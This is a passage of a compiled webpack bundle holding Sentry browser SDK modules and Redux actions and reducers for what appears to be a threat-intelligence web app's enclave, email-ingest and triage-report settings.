/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Memo; });
// tslint:disable:no-unsafe-any
/**
 * Memo class used for decycle json objects. Uses WeakSet if available otherwise array.
 */
var Memo = /** @class */ (function () {
    function Memo() {
        // tslint:disable-next-line
        this._hasWeakSet = typeof WeakSet === 'function';
        this._inner = this._hasWeakSet ? new WeakSet() : [];
    }
    /**
     * Sets obj to remember.
     * @param obj Object to remember
     */
    Memo.prototype.memoize = function (obj) {
        if (this._hasWeakSet) {
            if (this._inner.has(obj)) {
                return true;
            }
            this._inner.add(obj);
            return false;
        }
        // tslint:disable-next-line:prefer-for-of
        for (var i = 0; i < this._inner.length; i++) {
            var value = this._inner[i];
            if (value === obj) {
                return true;
            }
        }
        this._inner.push(obj);
        return false;
    };
    /**
     * Removes object from internal storage.
     * @param obj Object to forget
     */
    Memo.prototype.unmemoize = function (obj) {
        if (this._hasWeakSet) {
            this._inner.delete(obj);
        }
        else {
            for (var i = 0; i < this._inner.length; i++) {
                if (this._inner[i] === obj) {
                    this._inner.splice(i, 1);
                    break;
                }
            }
        }
    };
    return Memo;
}());

//# sourceMappingURL=memo.js.map

/***/ }),
/* 1424 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export TRACEPARENT_REGEXP */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Span; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_utils__ = __webpack_require__(53);

var TRACEPARENT_REGEXP = /^[ \t]*([0-9a-f]{32})?-?([0-9a-f]{16})?-?([01])?[ \t]*$/;
/**
 * Span containg all data about a span
 */
var Span = /** @class */ (function () {
    function Span(_traceId, _spanId, _sampled, _parent) {
        if (_traceId === void 0) { _traceId = Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["E" /* uuid4 */])(); }
        if (_spanId === void 0) { _spanId = Object(__WEBPACK_IMPORTED_MODULE_0__sentry_utils__["E" /* uuid4 */])().substring(16); }
        this._traceId = _traceId;
        this._spanId = _spanId;
        this._sampled = _sampled;
        this._parent = _parent;
    }
    /**
     * Setter for parent
     */
    Span.prototype.setParent = function (parent) {
        this._parent = parent;
        return this;
    };
    /**
     * Setter for sampled
     */
    Span.prototype.setSampled = function (sampled) {
        this._sampled = sampled;
        return this;
    };
    /**
     * Continues a trace
     * @param traceparent Traceparent string
     */
    Span.fromTraceparent = function (traceparent) {
        var matches = traceparent.match(TRACEPARENT_REGEXP);
        if (matches) {
            var sampled = void 0;
            if (matches[3] === '1') {
                sampled = true;
            }
            else if (matches[3] === '0') {
                sampled = false;
            }
            var parent_1 = new Span(matches[1], matches[2], sampled);
            return new Span(matches[1], undefined, sampled, parent_1);
        }
        return undefined;
    };
    /**
     * @inheritDoc
     */
    Span.prototype.toTraceparent = function () {
        var sampled = '';
        if (this._sampled === true) {
            sampled = '-1';
        }
        else if (this._sampled === false) {
            sampled = '-0';
        }
        return this._traceId + "-" + this._spanId + sampled;
    };
    /**
     * @inheritDoc
     */
    Span.prototype.toJSON = function () {
        return {
            parent: (this._parent && this._parent.toJSON()) || undefined,
            sampled: this._sampled,
            span_id: this._spanId,
            trace_id: this._traceId,
        };
    };
    return Span;
}());

//# sourceMappingURL=span.js.map

/***/ }),
/* 1425 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return NoopTransport; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__sentry_types__ = __webpack_require__(285);

/** Noop transport */
var NoopTransport = /** @class */ (function () {
    function NoopTransport() {
    }
    /**
     * @inheritDoc
     */
    NoopTransport.prototype.sendEvent = function (_) {
        return Promise.resolve({
            reason: "NoopTransport: Event has been skipped because no Dsn is configured.",
            status: __WEBPACK_IMPORTED_MODULE_0__sentry_types__["b" /* Status */].Skipped,
        });
    };
    /**
     * @inheritDoc
     */
    NoopTransport.prototype.close = function (_) {
        return Promise.resolve(true);
    };
    return NoopTransport;
}());

//# sourceMappingURL=noop.js.map

/***/ }),
/* 1426 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return BrowserClient; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_tslib__ = __webpack_require__(64);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__sentry_core__ = __webpack_require__(136);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__sentry_utils__ = __webpack_require__(53);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__backend__ = __webpack_require__(3233);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__version__ = __webpack_require__(1428);





/**
 * The Sentry Browser SDK Client.
 *
 * @see BrowserOptions for documentation on configuration options.
 * @see SentryClient for usage documentation.
 */
var BrowserClient = /** @class */ (function (_super) {
    __WEBPACK_IMPORTED_MODULE_0_tslib__["c" /* __extends */](BrowserClient, _super);
    /**
     * Creates a new Browser SDK instance.
     *
     * @param options Configuration options for this SDK.
     */
    function BrowserClient(options) {
        if (options === void 0) { options = {}; }
        return _super.call(this, __WEBPACK_IMPORTED_MODULE_3__backend__["a" /* BrowserBackend */], options) || this;
    }
    /**
     * @inheritDoc
     */
    BrowserClient.prototype._prepareEvent = function (event, scope, hint) {
        event.platform = event.platform || 'javascript';
        event.sdk = __WEBPACK_IMPORTED_MODULE_0_tslib__["a" /* __assign */]({}, event.sdk, { name: __WEBPACK_IMPORTED_MODULE_4__version__["a" /* SDK_NAME */], packages: __WEBPACK_IMPORTED_MODULE_0_tslib__["f" /* __spread */](((event.sdk && event.sdk.packages) || []), [
                {
                    name: 'npm:@sentry/browser',
                    version: __WEBPACK_IMPORTED_MODULE_4__version__["b" /* SDK_VERSION */],
                },
            ]), version: __WEBPACK_IMPORTED_MODULE_4__version__["b" /* SDK_VERSION */] });
        return _super.prototype._prepareEvent.call(this, event, scope, hint);
    };
    /**
     * Show a report dialog to the user to send feedback to a specific event.
     *
     * @param options Set individual options for the dialog
     */
    BrowserClient.prototype.showReportDialog = function (options) {
        if (options === void 0) { options = {}; }
        // doesn't work without a document (React Native)
        var document = Object(__WEBPACK_IMPORTED_MODULE_2__sentry_utils__["i" /* getGlobalObject */])().document;
        if (!document) {
            return;
        }
        if (!this._isEnabled()) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].error('Trying to call showReportDialog with Sentry Client is disabled');
            return;
        }
        var dsn = options.dsn || this.getDsn();
        if (!options.eventId) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].error('Missing `eventId` option in showReportDialog call');
            return;
        }
        if (!dsn) {
            __WEBPACK_IMPORTED_MODULE_2__sentry_utils__["t" /* logger */].error('Missing `Dsn` option in showReportDialog call');
            return;
        }
        var script = document.createElement('script');
        script.async = true;
        script.src = new __WEBPACK_IMPORTED_MODULE_1__sentry_core__["a" /* API */](dsn).getReportDialogEndpoint(options);
        if (options.onLoad) {
            script.onload = options.onLoad;
        }
        (document.head || document.body).appendChild(script);
    };
    return BrowserClient;
}(__WEBPACK_IMPORTED_MODULE_1__sentry_core__["c" /* BaseClient */]));

//# sourceMappingURL=client.js.map

/***/ }),
/* 1427 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__base__ = __webpack_require__(772);
/* unused harmony reexport BaseTransport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__fetch__ = __webpack_require__(3234);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_1__fetch__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__xhr__ = __webpack_require__(3235);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_2__xhr__["a"]; });



//# sourceMappingURL=index.js.map

/***/ }),
/* 1428 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SDK_NAME; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return SDK_VERSION; });
var SDK_NAME = 'sentry.javascript.browser';
var SDK_VERSION = '5.5.0';
//# sourceMappingURL=version.js.map

/***/ }),
/* 1429 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__globalhandlers__ = __webpack_require__(3237);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "GlobalHandlers", function() { return __WEBPACK_IMPORTED_MODULE_0__globalhandlers__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__trycatch__ = __webpack_require__(3238);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "TryCatch", function() { return __WEBPACK_IMPORTED_MODULE_1__trycatch__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__breadcrumbs__ = __webpack_require__(3239);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "Breadcrumbs", function() { return __WEBPACK_IMPORTED_MODULE_2__breadcrumbs__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__linkederrors__ = __webpack_require__(3240);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "LinkedErrors", function() { return __WEBPACK_IMPORTED_MODULE_3__linkederrors__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__useragent__ = __webpack_require__(3241);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "UserAgent", function() { return __WEBPACK_IMPORTED_MODULE_4__useragent__["a"]; });





//# sourceMappingURL=index.js.map

/***/ }),
/* 1430 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return STORE_SCROLL_POSITION; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SET_DETAIL_PANEL_OPTIONS; });
var prefix = function prefix(str) {
  return 'station/display/' + str;
};

var STORE_SCROLL_POSITION = prefix('STORE_SCROLL_POSITION');

var SET_DETAIL_PANEL_OPTIONS = prefix('SET_DETAIL_PANEL_OPTIONS');

/***/ }),
/* 1431 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "roles", function() { return roles; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);


var roles = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['roles', 'roles']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['roles', 'loading']);

/***/ }),
/* 1432 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setEnclaveMenu", function() { return setEnclaveMenu; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "selectEnclave", function() { return selectEnclave; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveEmailSettings", function() { return saveEmailSettings; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "timezoneChanged", function() { return timezoneChanged; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchIngestEmails", function() { return fetchIngestEmails; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteIngestEmail", function() { return deleteIngestEmail; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "editEmailIngest", function() { return editEmailIngest; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearEmailIngest", function() { return clearEmailIngest; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toggleSelectEmailIngest", function() { return toggleSelectEmailIngest; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearSelectedEmailIngests", function() { return clearSelectedEmailIngests; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "createNewEmailIngest", function() { return createNewEmailIngest; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "closeNewEmailForm", function() { return closeNewEmailForm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "confirmDeleteIngestEmail", function() { return confirmDeleteIngestEmail; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "cancelConfirmDeleteIngestEmail", function() { return cancelConfirmDeleteIngestEmail; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "requestNewEnclaveInbox", function() { return requestNewEnclaveInbox; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "cancelRequestNewEnclaveInbox", function() { return cancelRequestNewEnclaveInbox; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(776);



/* Toggle enclave select menu */
var setEnclaveMenu = function setEnclaveMenu(option) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["t" /* SET_ENCLAVE_MENU */],
    payload: option
  };
};

/* Select a default enclave */
var selectEnclave = function selectEnclave(name, id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["s" /* SELECT_DEFAULT_ENCLAVE */],
    payload: { name: name, id: id }
  };
};

var saveEmailSettings = function saveEmailSettings(values) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["p" /* SAVE_EMAIL_SETTINGS */],
    payload: values
  };
};

var timezoneChanged = function timezoneChanged(timezone) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["u" /* TIMEZONE_CHANGED */],
    payload: timezone
  };
};

var fetchIngestEmails = function fetchIngestEmails(params) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["m" /* FETCH_INGEST_EMAILS */],
    payload: params
  };
};

var deleteIngestEmail = function deleteIngestEmail(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["i" /* DELETE_INGEST_EMAIL */],
    payload: payload
  };
};

var editEmailIngest = function editEmailIngest(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["l" /* EDIT_EMAIL_INGEST */],
    payload: payload
  };
};

var clearEmailIngest = function clearEmailIngest() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["c" /* CLEAR_EMAIL_INGEST */]
  };
};

var toggleSelectEmailIngest = function toggleSelectEmailIngest(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["v" /* TOGGLE_SELECT_EMAIL_INGEST */],
    payload: payload
  };
};

var clearSelectedEmailIngests = function clearSelectedEmailIngests() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* CLEAR_SELECTED_EMAIL_INGEST */]
  };
};

var createNewEmailIngest = function createNewEmailIngest() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["h" /* CREATE_NEW_EMAIL_INGEST */]
  };
};

var closeNewEmailForm = function closeNewEmailForm() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["e" /* CLOSE_NEW_EMAIL_FORM */]
  };
};

var confirmDeleteIngestEmail = function confirmDeleteIngestEmail() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["f" /* CONFIRM_DELETE_INGEST_EMAIL */]
  };
};

var cancelConfirmDeleteIngestEmail = function cancelConfirmDeleteIngestEmail() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* CANCEL_CONFIRM_DELETE_INGEST_EMAIL */]
  };
};

var requestNewEnclaveInbox = function requestNewEnclaveInbox() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["g" /* CONFIRM_REQUEST_NEW_INGEST_EMAIL */]
  };
};

var cancelRequestNewEnclaveInbox = function cancelRequestNewEnclaveInbox() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["b" /* CANCEL_CONFIRM_REQUEST_NEW_INGEST_EMAIL */]
  };
};

/***/ }),
/* 1433 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return serialize; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_jstz__ = __webpack_require__(494);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_jstz___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_jstz__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types_js__ = __webpack_require__(776);










var getCurrentTimezone = function getCurrentTimezone() {
  return __WEBPACK_IMPORTED_MODULE_4_jstz___default.a.determine().name();
};

var Settings = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Record"])({
  enclaveMenuOpen: false,
  timezone: getCurrentTimezone() // Default to browser-determined timezone
});

var enclaveMenuOpen = function enclaveMenuOpen() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["t" /* SET_ENCLAVE_MENU */]:
      return payload;
    default:
      return state;
  }
};

var timezone = function timezone() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : getCurrentTimezone();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["u" /* TIMEZONE_CHANGED */]:
      return payload;
    default:
      return state;
  }
};

var ingestEmails = function ingestEmails() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["o" /* FETCH_INGEST_EMAILS_SUCCESS */]:
      {
        var isFirstPage = action.meta && action.meta.startPage === 0;
        return isFirstPage ? payload : state.merge(payload); // Append (merge) if we're paginating
      }

    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["k" /* DELETE_INGEST_EMAIL_SUCCESS */]:
      return state.delete(payload);

    default:
      return state;
  }
};

var Options = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Record"])({
  hasNext: false,
  nextPage: 0,
  startPage: 0,
  pageSize: 25,
  sortBy: 'ingestEmail', // See NOTE
  sortOrder: 'ASC'
});

var emailOptions = function emailOptions() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Options();
  var action = arguments[1];
  var type = action.type,
      meta = action.meta;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["o" /* FETCH_INGEST_EMAILS_SUCCESS */]:
      return state.set('nextPage', meta.startPage + 1).set('hasNext', meta.hasNext);
    default:
      return state;
  }
};

var emailLoading = function emailLoading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["m" /* FETCH_INGEST_EMAILS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["p" /* SAVE_EMAIL_SETTINGS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["i" /* DELETE_INGEST_EMAIL */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["o" /* FETCH_INGEST_EMAILS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["n" /* FETCH_INGEST_EMAILS_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["k" /* DELETE_INGEST_EMAIL_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* DELETE_INGEST_EMAIL_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["r" /* SAVE_EMAIL_SETTINGS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["q" /* SAVE_EMAIL_SETTINGS_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var creatingAdditionalInbox = function creatingAdditionalInbox() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["h" /* CREATE_NEW_EMAIL_INGEST */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["r" /* SAVE_EMAIL_SETTINGS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["e" /* CLOSE_NEW_EMAIL_FORM */]:
      return false;
    default:
      return state;
  }
};

// Represents the current EI being edited
var currentIngestEmailId = function currentIngestEmailId() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* EDIT_EMAIL_INGEST */]:
      return payload.guid;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["r" /* SAVE_EMAIL_SETTINGS_SUCCESS */]: // Reset on successful save
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* CLEAR_EMAIL_INGEST */]:
      return null;
    default:
      return state;
  }
};

var totalEmailCount = function totalEmailCount() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 0;
  var action = arguments[1];
  var type = action.type,
      meta = action.meta;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["o" /* FETCH_INGEST_EMAILS_SUCCESS */]:
      return meta.total;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["k" /* DELETE_INGEST_EMAIL_SUCCESS */]:
      return state - 1;
    default:
      return state;
  }
};

var selectedIngestEmails = function selectedIngestEmails() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : null;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["v" /* TOGGLE_SELECT_EMAIL_INGEST */]:
      if (state === payload.guid) return null;
      return payload.guid;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["k" /* DELETE_INGEST_EMAIL_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["r" /* SAVE_EMAIL_SETTINGS_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["d" /* CLEAR_SELECTED_EMAIL_INGEST */]:
      return null;
    default:
      return state;
  }
};

var showDeleteIngestModal = function showDeleteIngestModal() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* CONFIRM_DELETE_INGEST_EMAIL */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["i" /* DELETE_INGEST_EMAIL */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["k" /* DELETE_INGEST_EMAIL_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* DELETE_INGEST_EMAIL_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["a" /* CANCEL_CONFIRM_DELETE_INGEST_EMAIL */]:
      return false;
    default:
      return state;
  }
};

var showRequestNewIngestModal = function showRequestNewIngestModal() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["g" /* CONFIRM_REQUEST_NEW_INGEST_EMAIL */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["b" /* CANCEL_CONFIRM_REQUEST_NEW_INGEST_EMAIL */]:
      return false;
    default:
      return state;
  }
};

var serialize = function serialize(state) {
  return Object(__WEBPACK_IMPORTED_MODULE_3_trustar_utils__["pickImmutable"])(['timezone'], state);
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  ingestEmails: ingestEmails,
  emailOptions: emailOptions,
  emailLoading: emailLoading,
  timezone: timezone,
  enclaveMenuOpen: enclaveMenuOpen,
  currentIngestEmailId: currentIngestEmailId,
  totalEmailCount: totalEmailCount,
  selectedIngestEmails: selectedIngestEmails,
  creatingAdditionalInbox: creatingAdditionalInbox,
  showDeleteIngestModal: showDeleteIngestModal,
  showRequestNewIngestModal: showRequestNewIngestModal
}));

/***/ }),
/* 1434 */,
/* 1435 */,
/* 1436 */,
/* 1437 */,
/* 1438 */,
/* 1439 */,
/* 1440 */,
/* 1441 */,
/* 1442 */,
/* 1443 */,
/* 1444 */,
/* 1445 */,
/* 1446 */,
/* 1447 */,
/* 1448 */,
/* 1449 */,
/* 1450 */,
/* 1451 */,
/* 1452 */,
/* 1453 */,
/* 1454 */,
/* 1455 */,
/* 1456 */,
/* 1457 */,
/* 1458 */,
/* 1459 */,
/* 1460 */,
/* 1461 */,
/* 1462 */,
/* 1463 */,
/* 1464 */,
/* 1465 */,
/* 1466 */,
/* 1467 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sortOptions", function() { return sortOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sorterValues", function() { return sorterValues; });
var sortOptions = [{
  text: 'Newest to Oldest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'ASC'
  }
}, {
  text: 'Newest to Oldest Created',
  sort: {
    sortBy: 'created',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Created',
  sort: {
    sortBy: 'created',
    sortDirection: 'ASC'
  }
}];

var sorterValues = {
  searchSorterPlaceholder: 'Select',
  searchSorters: sortOptions[0]
};

/***/ }),
/* 1468 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "WHITELIST_ENDPOINT", function() { return WHITELIST_ENDPOINT; });
var WHITELIST_ENDPOINT = '/services/global/whitelist-terms';

/***/ }),
/* 1469 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "normalizeWhitelistEntry", function() { return normalizeWhitelistEntry; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);


/* Normalizes whitelist records */
var normalizeWhitelistEntry = function normalizeWhitelistEntry(entry) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])(entry)();
};

/***/ }),
/* 1470 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setTriageStatus", function() { return setTriageStatus; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchTriageReports", function() { return fetchTriageReports; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchTriageReportsSuccess", function() { return fetchTriageReportsSuccess; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchTriageReportsFailure", function() { return fetchTriageReportsFailure; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchTriageReportsAndEnrich", function() { return fetchTriageReportsAndEnrich; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetPage", function() { return resetPage; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types__ = __webpack_require__(799);


var setTriageStatus = function setTriageStatus(submissionId, status) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types__["f" /* SET_TRIAGE_STATUS_FOR_REPORT */],
    payload: { submissionId: submissionId, status: status }
  };
};

// TODO Add payload / query types
var fetchTriageReports = function fetchTriageReports(payload) {
  return {
